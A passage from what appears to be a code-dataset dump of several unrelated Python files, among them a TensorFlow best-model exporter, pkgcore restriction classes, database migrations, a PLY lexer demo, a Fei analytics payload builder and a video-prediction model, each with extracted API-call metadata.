is_the_final_export): export_result = None if self._model_dir != estimator.model_dir and self._event_file_pattern: # Loads best metric from event files. 
tf_logging.info('Loading best metric from event files.') self._model_dir = estimator.model_dir full_event_file_pattern = os.path.join(self._model_dir, self._event_file_pattern) self._best_eval_result = self._get_best_eval_result( full_event_file_pattern) if os.path.isfile(os.path.join(export_path, 'export.log')): self._log = {} try: self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r')) except json.JSONDecodeError: pass if len(self._log) == 0: self._best_eval_result = None if self._best_eval_result is None or self._compare_fn( best_eval_result=self._best_eval_result, current_eval_result=eval_result): tf_logging.info('Performing best model export.') self._best_eval_result = eval_result export_result = self._saved_model_exporter.export( estimator, export_path, checkpoint_path, eval_result, is_the_final_export) export_result_path = export_result.decode("utf-8") self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()} self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"]) self._garbage_collect_exports(export_path) with open(os.path.join(export_path, 'export.log'), 'w') as fp: json.dump(self._log, fp) return export_result def _copy_checkpoint(self, checkpoint_pattern, dest_path, step): for file in glob.glob(checkpoint_pattern + '*'): shutil.copy(file, dest_path) with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp: text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step)) fp.write(text) fp.close() def _garbage_collect_exports(self, export_dir_base): """Deletes older exports, retaining only a given number of the most recent. Export subdirectories are assumed to be named with monotonically increasing integers; the most recent are taken to be those with the largest values. Args: export_dir_base: the base directory under which each export is in a versioned subdirectory. """ if self._exports_to_keep is None: return def _export_version_parser(path): # create a simple parser that pulls the export_version from the directory. filename = os.path.basename(path.path) if not (len(filename) == 10 and filename.isdigit()): return None return path._replace(export_version=int(filename)) # pylint: disable=protected-access keep_filter = gc._largest_export_versions(self._exports_to_keep) delete_filter = gc._negation(keep_filter) for p in delete_filter( gc._get_paths(export_dir_base, parser=_export_version_parser)): try: del self._log[p.path] gfile.DeleteRecursively(p.path) except errors_impl.NotFoundError as e: tf_logging.warn('Can not delete %s recursively: %s', p.path, e) # pylint: enable=protected-access def _get_best_eval_result(self, event_files): """Get the best eval result from event files. Args: event_files: Absolute pattern of event files. Returns: The best eval result. """ if not event_files: return None event_count = 0 best_eval_result = None for event_file in gfile.Glob(os.path.join(event_files)): for event in summary_iterator.summary_iterator(event_file): if event.HasField('summary'): event_eval_result = {} for value in event.summary.value: if value.HasField('simple_value'): event_eval_result[value.tag] = value.simple_value if event_eval_result: if best_eval_result is None or self._compare_fn( best_eval_result, event_eval_result): event_count += 1 best_eval_result = event_eval_result if event_count < 2: return None return best_eval_result
[((627, 651), 'tensorflow.python.estimator.util.fn_args', 'util.fn_args', (['compare_fn'], {}), '(compare_fn)\n', (639, 651), False, 'from tensorflow.python.estimator import util\n'), ((6454, 6529), 'tensorflow.python.estimator.exporter._SavedModelExporter', '_SavedModelExporter', (['name', 'serving_input_receiver_fn', 'assets_extra', 'as_text'], {}), '(name, serving_input_receiver_fn, assets_extra, as_text)\n', (6473, 6529), False, 'from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter\n'), ((8977, 9012), 'glob.glob', 'glob.glob', (["(checkpoint_pattern + '*')"], {}), "(checkpoint_pattern + '*')\n", (8986, 9012), False, 'import glob\n'), ((10180, 10230), 'tensorflow.python.estimator.gc._largest_export_versions', 'gc._largest_export_versions', (['self._exports_to_keep'], {}), '(self._exports_to_keep)\n', (10207, 10230), False, 'from tensorflow.python.estimator import gc\n'), ((10255, 10280), 'tensorflow.python.estimator.gc._negation', 'gc._negation', (['keep_filter'], {}), '(keep_filter)\n', (10267, 10280), False, 'from tensorflow.python.estimator import gc\n'), ((7276, 7332), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Loading best metric from event files."""'], {}), "('Loading best metric from event files.')\n", (7291, 7332), False, 'from tensorflow.python.platform import tf_logging\n'), ((7422, 7477), 'os.path.join', 'os.path.join', (['self._model_dir', 'self._event_file_pattern'], {}), '(self._model_dir, self._event_file_pattern)\n', (7434, 7477), False, 'import os\n'), ((7661, 7700), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7673, 7700), False, 'import os\n'), ((8164, 8212), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Performing best model export."""'], {}), "('Performing best model export.')\n", (8179, 8212), False, 'from tensorflow.python.platform import tf_logging\n'), ((9026, 9054), 'shutil.copy', 'shutil.copy', (['file', 'dest_path'], {}), '(file, dest_path)\n', (9037, 9054), False, 'import shutil\n'), ((9930, 9957), 'os.path.basename', 'os.path.basename', (['path.path'], {}), '(path.path)\n', (9946, 9957), False, 'import os\n'), ((10330, 10391), 'tensorflow.python.estimator.gc._get_paths', 'gc._get_paths', (['export_dir_base'], {'parser': '_export_version_parser'}), '(export_dir_base, parser=_export_version_parser)\n', (10343, 10391), False, 'from tensorflow.python.estimator import gc\n'), ((11051, 11076), 'os.path.join', 'os.path.join', (['event_files'], {}), '(event_files)\n', (11063, 11076), False, 'import os\n'), ((11104, 11149), 'tensorflow.python.summary.summary_iterator.summary_iterator', 'summary_iterator.summary_iterator', (['event_file'], {}), '(event_file)\n', (11137, 11149), False, 'from tensorflow.python.summary import summary_iterator\n'), ((8832, 8856), 'json.dump', 'json.dump', (['self._log', 'fp'], {}), '(self._log, fp)\n', (8841, 8856), False, 'import json\n'), ((9073, 9110), 'os.path.join', 'os.path.join', (['dest_path', '"""checkpoint"""'], {}), "(dest_path, 'checkpoint')\n", (9085, 9110), False, 'import os\n'), ((10465, 10496), 'tensorflow.python.platform.gfile.DeleteRecursively', 'gfile.DeleteRecursively', (['p.path'], {}), '(p.path)\n', (10488, 10496), False, 'from tensorflow.python.platform import gfile\n'), ((8763, 8802), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (8775, 8802), False, 'import os\n'), ((10564, 10627), 
'tensorflow.python.platform.tf_logging.warn', 'tf_logging.warn', (['"""Can not delete %s recursively: %s"""', 'p.path', 'e'], {}), "('Can not delete %s recursively: %s', p.path, e)\n", (10579, 10627), False, 'from tensorflow.python.platform import tf_logging\n'), ((7790, 7829), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7802, 7829), False, 'import os\n')]
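The exporter above decides whether to export by calling compare_fn, and ships _loss_smaller as the default. A hedged sketch of a custom comparison that prefers higher accuracy instead, mirroring _loss_smaller from the file above (it assumes the estimator reports an 'accuracy' metric; not code from the repository):

def _accuracy_larger(best_eval_result, current_eval_result):
    key = 'accuracy'  # assumed metric name
    if not best_eval_result or key not in best_eval_result:
        raise ValueError('best_eval_result cannot be empty or no accuracy is found in it.')
    if not current_eval_result or key not in current_eval_result:
        raise ValueError('current_eval_result cannot be empty or no accuracy is found in it.')
    return best_eval_result[key] < current_eval_result[key]

# exporter = BestExporter(name='best_exporter',
#                         serving_input_receiver_fn=serving_input_receiver_fn,
#                         compare_fn=_accuracy_larger)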
mgorny/pkgcore
src/pkgcore/restrictions/restriction.py
ab4a718aa1626f4edeb385383f5595a1e262b0dc
# Copyright: 2005-2012 Brian Harring <[email protected] # Copyright: 2006 Marien Zwart <[email protected]> # License: BSD/GPL2 """ base restriction class """ from functools import partial from snakeoil import caching, klass from snakeoil.currying import pretty_docs class base(object, metaclass=caching.WeakInstMeta): """base restriction matching object. all derivatives *should* be __slot__ based (lot of instances may wind up in memory). """ __inst_caching__ = True # __weakref__ here is implicit via the metaclass __slots__ = () package_matching = False klass.inject_immutable_instance(locals()) def match(self, *arg, **kwargs): raise NotImplementedError def force_False(self, *arg, **kwargs): return not self.match(*arg, **kwargs) def force_True(self, *arg, **kwargs): return self.match(*arg, **kwargs) def __len__(self): return 1 class AlwaysBool(base): """restriction that always yields a specific boolean""" __slots__ = ("type", "negate") __inst_caching__ = True def __init__(self, node_type=None, negate=False): """ :param node_type: the restriction type the instance should be, typically :obj:`pkgcore.restrictions.packages.package_type` or :obj:`pkgcore.restrictions.values.value_type` :param negate: boolean to return for the match """ object.__setattr__(self, "negate", negate) object.__setattr__(self, "type", node_type) def match(self, *a, **kw): return self.negate def force_True(self, *a, **kw): return self.negate def force_False(self, *a, **kw): return not self.negate def __iter__(self): return iter(()) def __str__(self): return f"always '{self.negate}'" def __repr__(self): return '<%s always %r @%#8x>' % ( self.__class__.__name__, self.negate, id(self)) def __getstate__(self): return self.negate, self.type def __setstate__(self, state): negate, node_type = state object.__setattr__(self, "negate", negate) object.__setattr__(self, "type", node_type) class Negate(base): """wrap and negate a restriction instance""" __slots__ = ("type", "_restrict") __inst_caching__ = False def __init__(self, restrict): """ :param restrict: :obj:`pkgcore.restrictions.restriction.base` instance to negate """ sf = object.__setattr__ sf(self, "type", restrict.type) sf(self, "_restrict", restrict) def match(self, *a, **kw): return not self._restrict.match(*a, **kw) def __str__(self): return "not (%s)" % self._restrict class FakeType(base): """wrapper to wrap and fake a node_type""" __slots__ = ("type", "_restrict") __inst_caching__ = False def __init__(self, restrict, new_type): """ :param restrict: :obj:`pkgcore.restrictions.restriction.base` instance to wrap :param new_type: new node_type """ sf = object.__setattr__ sf(self, "type", new_type) sf(self, "_restrict", restrict) def match(self, *a, **kw): return self._restrict.match(*a, **kw) def __str__(self): return "Faked type(%s): %s" % (self.type, self._restrict) class AnyMatch(base): """Apply a nested restriction to every item in a sequence.""" __slots__ = ('restriction', 'type', 'negate') def __init__(self, childrestriction, node_type, negate=False): """Initialize. :type childrestriction: restriction :param childrestriction: child restriction applied to every value. :type node_type: string :param node_type: type of this restriction. 
""" sf = object.__setattr__ sf(self, "negate", negate) sf(self, "restriction", childrestriction) sf(self, "type", node_type) def match(self, val): for x in val: if self.restriction.match(x): return not self.negate return self.negate def __str__(self): return "any: %s match" % (self.restriction,) def __repr__(self): return '<%s restriction=%r @%#8x>' % ( self.__class__.__name__, self.restriction, id(self)) def curry_node_type(cls, node_type, extradoc=None): """Helper function for creating restrictions of a certain type. This uses :obj:`partial` to pass a node_type to the wrapped class, and extends the docstring. :param cls: callable (usually a class) that is wrapped. :param node_type: value passed as node_type. :param extradoc: addition to the docstring. Defaults to "Automatically set to %s type." % node_type :return: a wrapped callable. """ if extradoc is None: extradoc = "Automatically set to %s type." % (node_type,) doc = cls.__doc__ result = partial(cls, node_type=node_type) if doc is None: doc = '' else: # do this so indentation on pydoc __doc__ is sane doc = "\n".join(line.lstrip() for line in doc.split("\n")) + "\n" doc += extradoc return pretty_docs(result, doc) value_type = "values" package_type = "package" valid_types = (value_type, package_type)
[((4966, 4999), 'functools.partial', 'partial', (['cls'], {'node_type': 'node_type'}), '(cls, node_type=node_type)\n', (4973, 4999), False, 'from functools import partial\n'), ((5214, 5238), 'snakeoil.currying.pretty_docs', 'pretty_docs', (['result', 'doc'], {}), '(result, doc)\n', (5225, 5238), False, 'from snakeoil.currying import pretty_docs\n')]
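A small illustrative sketch of how the helpers above compose (hypothetical usage, not taken from pkgcore itself): curry_node_type wraps a restriction class so its node_type is fixed, and AlwaysBool then matches purely according to its negate flag.

from pkgcore.restrictions.restriction import AlwaysBool, curry_node_type, package_type

AlwaysTruePackage = curry_node_type(AlwaysBool, package_type)
restrict = AlwaysTruePackage(negate=True)
assert restrict.type == package_type
assert restrict.match(object()) is True  # negate=True makes match() always succeed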
kkaarreell/keylime
keylime/migrations/versions/8da20383f6e1_extend_ip_field.py
e12658bb6dc945b694e298b8ac337a204ab86ed2
"""extend_ip_field Revision ID: 8da20383f6e1 Revises: eeb702f77d7d Create Date: 2021-01-14 10:50:56.275257 """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = "8da20383f6e1" down_revision = "eeb702f77d7d" branch_labels = None depends_on = None def upgrade(engine_name): globals()[f"upgrade_{engine_name}"]() def downgrade(engine_name): globals()[f"downgrade_{engine_name}"]() def upgrade_registrar(): pass def downgrade_registrar(): pass def upgrade_cloud_verifier(): with op.batch_alter_table("verifiermain") as batch_op: batch_op.alter_column( "ip", existing_type=sa.String(length=15), type_=sa.String(length=255), existing_nullable=True ) def downgrade_cloud_verifier(): pass
[((557, 593), 'alembic.op.batch_alter_table', 'op.batch_alter_table', (['"""verifiermain"""'], {}), "('verifiermain')\n", (577, 593), False, 'from alembic import op\n'), ((670, 690), 'sqlalchemy.String', 'sa.String', ([], {'length': '(15)'}), '(length=15)\n', (679, 690), True, 'import sqlalchemy as sa\n'), ((698, 719), 'sqlalchemy.String', 'sa.String', ([], {'length': '(255)'}), '(length=255)\n', (707, 719), True, 'import sqlalchemy as sa\n')]
Tatsuya26/processamento_de_linguagens
token_train/quickdemo(1)(1).py
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
import ply.lex as lex

tokens = ["NUM", "OPERADORES"]

t_NUM = r'\d+'
t_OPERADORES = r'[+*-]'  # the operators used in the examples below: + - *
t_ignore = '\n\t '


def t_error(t):
    print("Erro")
    print(t)
    t.lexer.skip(1)  # skip the offending character instead of aborting


lexer = lex.lex()

# 1+2 1-2 1*2
# hello world
import sys

for line in sys.stdin:
    lexer.input(line)
    for tok in lexer:
        print(tok)
[((167, 176), 'ply.lex.lex', 'lex.lex', ([], {}), '()\n', (174, 176), True, 'import ply.lex as lex\n')]
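A small self-contained check of the lexer above without reading from stdin (hypothetical snippet; token values stay strings because no conversion function is defined):

lexer.input("1+2 3*4")
print([(tok.type, tok.value) for tok in lexer])
# [('NUM', '1'), ('OPERADORES', '+'), ('NUM', '2'), ('NUM', '3'), ('OPERADORES', '*'), ('NUM', '4')]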
Ecotrust/ucsrb
ucsrb/migrations/0013_auto_20180710_2040.py
29d97cf1f21537aaf24f38e7dedc7c8cfccf1f12
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-07-10 20:40
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('ucsrb', '0012_auto_20180710_1249'),
    ]

    operations = [
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type_checkboxes',
            field=models.TextField(blank=True, default=None, null=True),
        ),
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type_checkboxes_include_east_west',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type_checkboxes_include_floor',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type_checkboxes_include_north',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type_checkboxes_include_ridgetop',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='treatmentscenario',
            name='landform_type_checkboxes_include_south',
            field=models.BooleanField(default=True),
        ),
    ]
[((415, 449), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (434, 449), False, 'from django.db import migrations, models\n'), ((598, 651), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'default': 'None', 'null': '(True)'}), '(blank=True, default=None, null=True)\n', (614, 651), False, 'from django.db import migrations, models\n'), ((818, 851), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (837, 851), False, 'from django.db import migrations, models\n'), ((1014, 1047), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1033, 1047), False, 'from django.db import migrations, models\n'), ((1210, 1243), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1229, 1243), False, 'from django.db import migrations, models\n'), ((1409, 1442), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1428, 1442), False, 'from django.db import migrations, models\n'), ((1605, 1638), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (1624, 1638), False, 'from django.db import migrations, models\n')]
fei-protocol/checkthechain
src/ctc/protocols/fei_utils/analytics/payload_crud.py
ec838f3d0d44af228f45394d9ba8d8eb7f677520
from __future__ import annotations

import typing

from ctc import spec

from . import timestamp_crud
from . import metric_crud
from . import analytics_spec


async def async_create_payload(
    *,
    blocks: typing.Sequence[spec.BlockNumberReference] | None = None,
    timestamps: typing.Sequence[int] | None = None,
    timescale: analytics_spec.TimescaleSpec | None = None,
    end_time: analytics_spec.Timestamp | None = None,
    window_size: str | None = None,
    interval_size: str | None = None,
    provider: spec.ProviderSpec = None,
) -> analytics_spec.AnalyticsPayload:
    """create data payload from scratch"""

    time_data = await timestamp_crud.async_get_time_data(
        blocks=blocks,
        timestamps=timestamps,
        timescale=timescale,
        end_time=end_time,
        window_size=window_size,
        interval_size=interval_size,
        provider=provider,
    )

    # get data
    data = await metric_crud.async_get_metrics(
        blocks=time_data['block_numbers']
    )

    return {
        'version': '0.1.0',
        #
        # time data
        'n_samples': time_data['n_samples'],
        'window_size': time_data['window_size'],
        'interval_size': time_data['interval_size'],
        'timestamps': time_data['timestamps'],
        'block_numbers': time_data['block_numbers'],
        'created_at_timestamp': time_data['created_at_timestamp'],
        #
        # metric data
        'data': data,
    }


# def update_payload(
#     timescale: analytics_spec.Timescale,
#     old_payload: analytics_spec.AnalyticsPayload,
# ) -> analytics_spec.AnalyticsPayload:

#     new_timestamps = get_new_timestamps(
#         timescale=timescale,
#         old_payload=old_payload,
#     )

#     new_blocks = get_new_blocks(
#         new_timestamps=new_timestamps,
#         old_payload=old_payload,
#     )

#     new_metrics = get_metrics(blocks=new_blocks)

#     return combine_new_data(
#         old_payload=old_payload,
#         new_metrics=new_metrics,
#     )
[]
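A hedged usage sketch of the coroutine above; the block numbers are invented for illustration, and a fully configured ctc environment (RPC provider, network settings) is assumed:

import asyncio

from ctc.protocols.fei_utils.analytics import payload_crud

async def main():
    payload = await payload_crud.async_create_payload(
        blocks=[14000000, 14010000, 14020000],  # hypothetical block numbers
    )
    print(payload['n_samples'], payload['interval_size'])

# asyncio.run(main())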
mbz/models
research/video_prediction/prediction_model.py
98dcd8dbcb1027e4b22f79113018df30da4b8590
# Copyright 2016 The TensorFlow Authors All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Model architecture for predictive model, including CDNA, DNA, and STP.""" import numpy as np import tensorflow as tf import tensorflow.contrib.slim as slim from tensorflow.python.platform import flags from tensorflow.contrib.layers.python import layers as tf_layers from lstm_ops import basic_conv_lstm_cell FLAGS = flags.FLAGS # Amount to use when lower bounding tensors RELU_SHIFT = 1e-12 # kernel size for DNA and CDNA. DNA_KERN_SIZE = 5 def kl_divergence(mu, log_sigma): """KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1). Args: mu: mu parameter of the distribution. log_sigma: log(sigma) parameter of the distribution. Returns: the KL loss. """ return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma), axis=1) def construct_latent_tower(images): """Builds convolutional latent tower for stochastic model. At training time this tower generates a latent distribution (mean and std) conditioned on the entire video. This latent variable will be fed to the main tower as an extra variable to be used for future frames prediction. At inference time, the tower is disabled and only returns latents sampled from N(0,1). If the multi_latent flag is on, a different latent for every timestep would be generated. 
Args: images: tensor of ground truth image sequences Returns: latent_mean: predicted latent mean latent_std: predicted latent standard deviation latent_loss: loss of the latent twoer samples: random samples sampled from standard guassian """ with slim.arg_scope([slim.conv2d], reuse=False): stacked_images = tf.concat(images, 3) latent_enc1 = slim.conv2d( stacked_images, 32, [3, 3], stride=2, scope='latent_conv1', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm1'}) latent_enc2 = slim.conv2d( latent_enc1, 64, [3, 3], stride=2, scope='latent_conv2', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm2'}) latent_enc3 = slim.conv2d( latent_enc2, 64, [3, 3], stride=1, scope='latent_conv3', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm3'}) latent_mean = slim.conv2d( latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, activation_fn=None, scope='latent_mean', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_norm_mean'}) latent_std = slim.conv2d( latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, scope='latent_std', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'latent_std_norm'}) latent_std += FLAGS.latent_std_min divergence = kl_divergence(latent_mean, latent_std) latent_loss = tf.reduce_mean(divergence) if FLAGS.multi_latent: # timestep x batch_size x latent_size samples = tf.random_normal( [FLAGS.sequence_length-1] + latent_mean.shape, 0, 1, dtype=tf.float32) else: # batch_size x latent_size samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32) if FLAGS.inference_time: # No latent tower at inference time, just standard gaussian. return None, None, None, samples else: return latent_mean, latent_std, latent_loss, samples def construct_model(images, actions=None, states=None, iter_num=-1.0, k=-1, use_state=True, num_masks=10, stp=False, cdna=True, dna=False, context_frames=2): """Build convolutional lstm video predictor using STP, CDNA, or DNA. Args: images: tensor of ground truth image sequences actions: tensor of action sequences states: tensor of ground truth state sequences iter_num: tensor of the current training iteration (for sched. sampling) k: constant used for scheduled sampling. -1 to feed in own prediction. use_state: True to include state and action in prediction num_masks: the number of different pixel motion predictions (and the number of masks for each of those predictions) stp: True to use Spatial Transformer Predictor (STP) cdna: True to use Convoluational Dynamic Neural Advection (CDNA) dna: True to use Dynamic Neural Advection (DNA) context_frames: number of ground truth frames to pass in before feeding in own predictions Returns: gen_images: predicted future image frames gen_states: predicted future states Raises: ValueError: if more than one network option specified or more than 1 mask specified for DNA model. """ # Each image is being used twice, in latent tower and main tower. # This is to make sure we are using the *same* image for both, ... # ... given how TF queues work. images = [tf.identity(image) for image in images] if stp + cdna + dna != 1: raise ValueError('More than one, or no network option specified.') batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4] lstm_func = basic_conv_lstm_cell # Generated robot states and images. gen_states, gen_images = [], [] current_state = states[0] if k == -1: feedself = True else: # Scheduled sampling: # Calculate number of ground-truth frames to pass in. 
num_ground_truth = tf.to_int32( tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k))))) feedself = False # LSTM state sizes and states. lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32])) lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None lstm_state5, lstm_state6, lstm_state7 = None, None, None # Latent tower latent_loss = 0.0 if FLAGS.stochastic_model: latent_tower_outputs = construct_latent_tower(images) latent_mean, latent_std, latent_loss, samples = latent_tower_outputs # Main tower for image, action in zip(images[:-1], actions[:-1]): # Reuse variables after the first timestep. reuse = bool(gen_images) done_warm_start = len(gen_images) > context_frames - 1 with slim.arg_scope( [lstm_func, slim.layers.conv2d, slim.layers.fully_connected, tf_layers.layer_norm, slim.layers.conv2d_transpose], reuse=reuse): if feedself and done_warm_start: # Feed in generated image. prev_image = gen_images[-1] elif done_warm_start: # Scheduled sampling prev_image = scheduled_sample(image, gen_images[-1], batch_size, num_ground_truth) else: # Always feed in ground_truth prev_image = image # Predicted state is always fed back in state_action = tf.concat(axis=1, values=[action, current_state]) enc0 = slim.layers.conv2d( prev_image, 32, [5, 5], stride=2, scope='scale1_conv1', normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'layer_norm1'}) hidden1, lstm_state1 = lstm_func( enc0, lstm_state1, lstm_size[0], scope='state1') hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2') hidden2, lstm_state2 = lstm_func( hidden1, lstm_state2, lstm_size[1], scope='state2') hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3') enc1 = slim.layers.conv2d( hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2') hidden3, lstm_state3 = lstm_func( enc1, lstm_state3, lstm_size[2], scope='state3') hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4') hidden4, lstm_state4 = lstm_func( hidden3, lstm_state4, lstm_size[3], scope='state4') hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5') enc2 = slim.layers.conv2d( hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3') # Pass in state and action. smear = tf.reshape( state_action, [int(batch_size), 1, 1, int(state_action.get_shape()[1])]) smear = tf.tile( smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1]) if use_state: enc2 = tf.concat(axis=3, values=[enc2, smear]) # Setup latent if FLAGS.stochastic_model: latent = samples if FLAGS.multi_latent: latent = samples[timestep] if not FLAGS.inference_time: latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage, lambda: tf.identity(latent), lambda: latent_mean + tf.exp(latent_std / 2.0) * latent) with tf.control_dependencies([latent]): enc2 = tf.concat([enc2, latent], 3) enc3 = slim.layers.conv2d( enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4') hidden5, lstm_state5 = lstm_func( enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8 hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6') enc4 = slim.layers.conv2d_transpose( hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1') hidden6, lstm_state6 = lstm_func( enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16 hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7') # Skip connection. 
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16 enc5 = slim.layers.conv2d_transpose( hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2') hidden7, lstm_state7 = lstm_func( enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32 hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8') # Skip connection. hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32 enc6 = slim.layers.conv2d_transpose( hidden7, hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None, normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope': 'layer_norm9'}) if dna: # Using largest hidden state for predicting untied conv kernels. enc7 = slim.layers.conv2d_transpose( enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None) else: # Using largest hidden state for predicting a new image layer. enc7 = slim.layers.conv2d_transpose( enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None) # This allows the network to also generate one image from scratch, # which is useful when regions of the image become unoccluded. transformed = [tf.nn.sigmoid(enc7)] if stp: stp_input0 = tf.reshape(hidden5, [int(batch_size), -1]) stp_input1 = slim.layers.fully_connected( stp_input0, 100, scope='fc_stp') transformed += stp_transformation(prev_image, stp_input1, num_masks) elif cdna: cdna_input = tf.reshape(hidden5, [int(batch_size), -1]) transformed += cdna_transformation(prev_image, cdna_input, num_masks, int(color_channels)) elif dna: # Only one mask is supported (more should be unnecessary). if num_masks != 1: raise ValueError('Only one mask is supported for DNA model.') transformed = [dna_transformation(prev_image, enc7)] masks = slim.layers.conv2d_transpose( enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None) masks = tf.reshape( tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])), [int(batch_size), int(img_height), int(img_width), num_masks + 1]) mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks) output = mask_list[0] * prev_image for layer, mask in zip(transformed, mask_list[1:]): output += layer * mask gen_images.append(output) current_state = slim.layers.fully_connected( state_action, int(current_state.get_shape()[1]), scope='state_pred', activation_fn=None) gen_states.append(current_state) return gen_images, gen_states, latent_loss ## Utility functions def stp_transformation(prev_image, stp_input, num_masks): """Apply spatial transformer predictor (STP) to previous image. Args: prev_image: previous image to be transformed. stp_input: hidden layer to be used for computing STN parameters. num_masks: number of masks and hence the number of STP transformations. Returns: List of images transformed by the predicted STP parameters. """ # Only import spatial transformer if needed. from spatial_transformer import transformer identity_params = tf.convert_to_tensor( np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32)) transformed = [] for i in range(num_masks - 1): params = slim.layers.fully_connected( stp_input, 6, scope='stp_params' + str(i), activation_fn=None) + identity_params transformed.append(transformer(prev_image, params)) return transformed def cdna_transformation(prev_image, cdna_input, num_masks, color_channels): """Apply convolutional dynamic neural advection to previous image. Args: prev_image: previous image to be transformed. cdna_input: hidden lyaer to be used for computing CDNA kernels. num_masks: the number of masks and hence the number of CDNA transformations. 
